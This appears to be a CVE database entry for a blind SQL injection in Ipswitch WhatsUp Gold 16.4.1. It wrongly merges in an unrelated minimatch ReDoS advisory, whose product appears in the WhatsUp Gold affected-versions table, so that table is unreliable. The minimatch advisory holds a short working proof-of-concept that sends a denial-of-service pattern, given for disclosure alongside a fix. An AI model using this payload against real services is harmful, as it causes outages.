CVE-2016-1000000
published 2016-10-06CVE-2016-1000000: Ipswitch WhatsUp Gold 16.4.1 WrFreeFormText.asp sUniqueID Parameter Blind SQL Injection
PriorityP349high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
EPSS
1.33%
67.6th percentile
Ipswitch WhatsUp Gold 16.4.1 WrFreeFormText.asp sUniqueID Parameter Blind SQL Injection
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| minimatch_project | minimatch | >= 0 < 3.0.2 | 3.0.2 |
| progress | whatsup_gold | <= 16.4 | — |
CVSS provenance
nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6mpc-6pf6-9cp5: Ipswitch WhatsUp Gold 16
ghsa_unreviewed·2022-05-17
CVE-2016-1000000 [HIGH] CWE-89 GHSA-6mpc-6pf6-9cp5: Ipswitch WhatsUp Gold 16
Ipswitch WhatsUp Gold 16.4.1 WrFreeFormText.asp sUniqueID Parameter Blind SQL Injection
GHSA
Regular Expression Denial of Service in minimatch
ghsa·2018-10-09
CVE-2016-10540 [HIGH] CWE-400 Regular Expression Denial of Service in minimatch
Regular Expression Denial of Service in minimatch
Affected versions of `minimatch` are vulnerable to regular expression denial of service attacks when user input is passed into the `pattern` argument of `minimatch(path, pattern)`.
## Proof of Concept
```js
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
```
## Recommendation
Update to version 3.0.2 or later.
No detection rules found.
No writeups or analysis indexed.
2016-10-06
Published